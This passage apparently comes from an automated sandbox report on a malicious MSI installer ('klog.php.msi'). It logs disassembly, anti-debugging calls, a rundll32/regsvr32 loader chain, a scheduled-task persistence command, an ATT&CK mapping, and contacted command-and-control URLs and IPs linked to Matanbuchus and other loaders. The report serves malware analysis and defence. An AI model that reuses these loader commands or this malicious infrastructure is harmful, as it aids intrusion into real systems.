Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19E3A0 mov eax, dword ptr fs:[00000030h]	14_2_7F19E3A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19D3E0 mov ecx, dword ptr fs:[00000030h]	14_2_7F19D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19D3E0 mov eax, dword ptr fs:[00000030h]	14_2_7F19D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19D3E0 mov ecx, dword ptr fs:[00000030h]	14_2_7F19D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19D3E0 mov edx, dword ptr fs:[00000030h]	14_2_7F19D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19D3E0 mov eax, dword ptr fs:[00000030h]	14_2_7F19D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F17DA10 mov edx, dword ptr fs:[00000030h]	14_2_7F17DA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F17DA10 mov eax, dword ptr fs:[00000030h]	14_2_7F17DA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1C7A0D mov eax, dword ptr fs:[00000030h]	14_2_7F1C7A0D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F182A20 mov eax, dword ptr fs:[00000030h]	14_2_7F182A20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F17E250 mov edx, dword ptr fs:[00000030h]	14_2_7F17E250
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19B260 mov ecx, dword ptr fs:[00000030h]	14_2_7F19B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19B260 mov eax, dword ptr fs:[00000030h]	14_2_7F19B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19B260 mov edx, dword ptr fs:[00000030h]	14_2_7F19B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19B260 mov eax, dword ptr fs:[00000030h]	14_2_7F19B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19B260 mov ecx, dword ptr fs:[00000030h]	14_2_7F19B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F199A90 mov eax, dword ptr fs:[00000030h]	14_2_7F199A90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F174280 mov edx, dword ptr fs:[00000030h]	14_2_7F174280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F174280 mov ecx, dword ptr fs:[00000030h]	14_2_7F174280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F174280 mov ecx, dword ptr fs:[00000030h]	14_2_7F174280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F174280 mov ecx, dword ptr fs:[00000030h]	14_2_7F174280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F174280 mov ecx, dword ptr fs:[00000030h]	14_2_7F174280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F174280 mov edx, dword ptr fs:[00000030h]	14_2_7F174280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1772D0 mov edx, dword ptr fs:[00000030h]	14_2_7F1772D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1742E4 mov edx, dword ptr fs:[00000030h]	14_2_7F1742E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1742E4 mov ecx, dword ptr fs:[00000030h]	14_2_7F1742E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19C170 mov eax, dword ptr fs:[00000030h]	14_2_7F19C170
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov edx, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov ecx, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov eax, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov eax, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov eax, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov eax, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov eax, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov edx, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160 mov eax, dword ptr fs:[00000030h]	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1C7998 mov eax, dword ptr fs:[00000030h]	14_2_7F1C7998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19E1B0 mov eax, dword ptr fs:[00000030h]	14_2_7F19E1B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1C79DC mov eax, dword ptr fs:[00000030h]	14_2_7F1C79DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19E1C0 mov edx, dword ptr fs:[00000030h]	14_2_7F19E1C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov ecx, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov ecx, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov eax, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov eax, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov eax, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov eax, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov eax, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov eax, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800 mov eax, dword ptr fs:[00000030h]	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1A8870 mov ecx, dword ptr fs:[00000030h]	14_2_7F1A8870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1A8870 mov edx, dword ptr fs:[00000030h]	14_2_7F1A8870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1A8870 mov eax, dword ptr fs:[00000030h]	14_2_7F1A8870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1A8870 mov ecx, dword ptr fs:[00000030h]	14_2_7F1A8870

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_7EE495F0 GetProcessHeap,GetDriveTypeA,

4_2_7EE495F0

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6C55F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6C55F233
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE61665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_7EE61665
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE61417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_7EE61417
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE652A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_7EE652A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_6BEDF233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6BEDF233
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF31665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_7EF31665
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF31417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_7EF31417
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF352A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_7EF352A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F511665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_7F511665
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F511417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_7F511417
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F5152A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_7F5152A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1B1665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_7F1B1665
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1B1417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_7F1B1417
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1B52A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_7F1B52A3

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 185.234.216.175 443

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_7EE611CC cpuid

4_2_7EE611CC

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_7EE73E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_7EE7AC51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_7EE7AA7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_7EE7AB82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_7EE7A953
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_7EE7A675
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_7EE7A700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_7EE7A5DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_7EE7A58F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	4_2_7EE7A2ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_7EE743AE

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_7EE61534 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_7EE61534

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_6BED51C0 DllInstall,GetTempFileNameW,GetFileType,GetSystemDirectoryA,LoadLibraryA,GetUserNameA,lstrlenA,lstrlenA,

6_2_6BED51C0

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	31 Security Software Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
klog.php.msi	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\8f08\701188\701188.winmd	5%	ReversingLabs
C:\Users\user\AppData\Roaming\silver\libcurl.dll	5%	ReversingLabs
C:\Windows\Installer\MSIEF45.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIEFA4.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIEFD4.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIF014.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://security-patches.systems/verif.aspx0	0%	Avira URL Cloud	safe
https://security-patches.systems/	0%	Avira URL Cloud	safe
https://security-patches.systems/AdminAccounts.aspx	0%	Avira URL Cloud	safe
https://security-patches.systems/verif.aspx	0%	Avira URL Cloud	safe
http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.php	0%	Avira URL Cloud	safe
https://security-patches.systems/verif.aspxhttps://security-patches.systems/verif.aspxhttps://securi	0%	Avira URL Cloud	safe
https://security-patches.systems/32	0%	Avira URL Cloud	safe
http://schemas.xml	0%	Avira URL Cloud	safe
https://security-patches.systems/.	0%	Avira URL Cloud	safe
https://security-patches.systems/verif.aspxF1yY	0%	Avira URL Cloud	safe
https://security-patches.systems/AdminAccounts.aspx1Q	0%	Avira URL Cloud	safe
https://security-patches.systems/verif.aspxt1	0%	Avira URL Cloud	safe
https://security-patches.systems/c	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
security-patches.systems	185.234.216.175	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://security-patches.systems/AdminAccounts.aspx	true	Avira URL Cloud: safe	unknown
https://security-patches.systems/verif.aspx	true	Avira URL Cloud: safe	unknown
http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://security-patches.systems/verif.aspx0	rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/	rundll32.exe, 00000004.00000002.4166785413.0000000002D5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/verif.aspxF1yY	rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/verif.aspxhttps://security-patches.systems/verif.aspxhttps://securi	rundll32.exe, 00000004.00000002.4167015419.0000000004717000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/.	rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xml	regsvr32.exe	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/32	rundll32.exe, 00000004.00000003.1784679532.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/verif.aspxt1	rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/AdminAccounts.aspx1Q	rundll32.exe, 00000004.00000002.4166785413.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/c	rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.234.216.175	security-patches.systems	Poland		197226	SPRINT-SDCPL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570375
Start date and time:	2024-12-06 22:10:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	klog.php.msi
Detection:	MAL
Classification:	mal92.troj.evad.winMSI@23/24@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .msi Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: klog.php.msi

Simulations

Behavior and APIs

Time	Type	Description
16:11:31	API Interceptor	124x Sleep call for process: rundll32.exe modified
21:11:08	Task Scheduler	Run new task: {EB5E4040-FB82-404B-A8E5-447739F6327D} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.234.216.175	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse	security-patches.systems/WinDefUpdates/DefenderUpdates/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
security-patches.systems	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse	185.234.216.175

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINT-SDCPL	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse	185.234.216.175
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/email.email.panda%C2%ADdoc%C2%AD.net/c/eJxUkE2P2yAQhn-NuWWFARt88CFVY612oypR2m7UywqGwSGJDcLY3c2vryJ1-3EbjeZ99MxrW1Nz4xSxAeYBx_zqbdufVQy8WvbnZ4mHr1v5vX_uDcG2lJxXVAlZk1MLSiPjHKRWYBw4lJZJCRqkEVJZQXzLKBMlo3WpqKz4g6l4zS03pmSmLmVZCIqD9teHqEerbYCHETPx02tOGlCbK7Y5zUiu7SnnOBV8XbCuYJ2O8W8EwlCw7kO_YN3CCt7lcMGx4J8NSlVVAgyKymkGjIKWqBoJ3DlUXIGiDUhX8I6MIXvnQWcfxnsNzgkqLMCqwQZWolF0pTk0K0qZQ7S1QVeTkHo9-tuf0GZ5eheeH9Pm7by_vbzf7PD4ZUdSG09zSoWgIWY_zMOUtXN-7O_-JOHip9-A-fB43HRxdxy-Qfi03b-sbbxIktuPF_8ZV1mnHv_bTPeLpWXkZ0iXKWrAO3SXD-unw3Y8i7e8HH7ki-bz5H4FAAD__zN8qVc	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://app.pandadoc.com/document/v2?token=4f650edf0fbe63c284330a0c3237efbdcb934f50?	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQZ0SJXHBh4xy1QJrAgdMgyCbgZWgRtkRFou0qT18YaHrZDQbzDb7_99rWaINkPrlzT0N-i15vjtunx_Nc993rcr7cH5Zt3O4TI80bLFGBkBXrNArVmFqSVAGENw14FwCtIRCuVihY1FBCxUvkvMYacM0x2FDzyjloQt34oiqpN_G0Hs3gjU9uPVBmcX7Lk3Fk7Il0ns7ETrrLeZwL3BTQFtCacfyDuNQX0H7qF9BeoMA2pyMNBf5HygF3aEMVlOCukaJBAUII5AqxaSyEiqRyBbZsSDmG6EyOabjVwA1BjRJWQflyVUniK2mNWwWrZOld8KoOLE0HM8SP31Aks8XnL92iWvXuuuHu8WX3umOTns1woNOpqMpzTmM0IdqJbvZsokucf-H2-rw8zN-_3t_9oIeXfrffbPaqYll_BvxrXGUzHeifzXy7uGhg1zQd59E4uj192kkv3bel-_j_kK--n6-b5t39DAAA__9AXKZY	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://app.pandadoc.com/document/v2?token=e9c21c3bf4f951c78573525553193377b2f4e89c?	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWA	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://app.pandadoc.com/document/v2?token=2126fee3194112970cb23c51d0c56249323ace2b	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJ	Get hash	malicious	Unknown	Browse	188.68.242.180
	kingdom.ps1	Get hash	malicious	Atlantida Stealer	Browse	185.234.216.181

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse	185.234.216.175
	resume.docx.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175
	JSWunwO4rS.lnk	Get hash	malicious	LummaC Stealer	Browse	185.234.216.175
	apilibx64.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	185.234.216.175
	Fortexternal.exe	Get hash	malicious	Unknown	Browse	185.234.216.175
	Setup.msi	Get hash	malicious	Unknown	Browse	185.234.216.175
	Document_PDF.vbs	Get hash	malicious	FormBook	Browse	185.234.216.175
	Pr9cqW75nY.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175
	G3vWD786PN.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175
	hTXtTJXdLt.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\silver\libcurl.dll	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse
C:\Windows\Installer\MSIEF45.tmp	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse
	fes.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	merd.msi	Get hash	malicious	Unknown	Browse
	medk.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	lavi.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	Document-v09-42-38.js	Get hash	malicious	BruteRatel	Browse
	Document-v05-53-20.js	Get hash	malicious	BruteRatel, Latrodectus	Browse
	FW3x3p4eZ5.msi	Get hash	malicious	Bazar Loader, BruteRatel	Browse
	Document-19-06-38.js	Get hash	malicious	BruteRatel	Browse
C:\Users\user\8f08\701188\701188.winmd	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse

Created / dropped Files

C:\Config.Msi\58ee4d.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
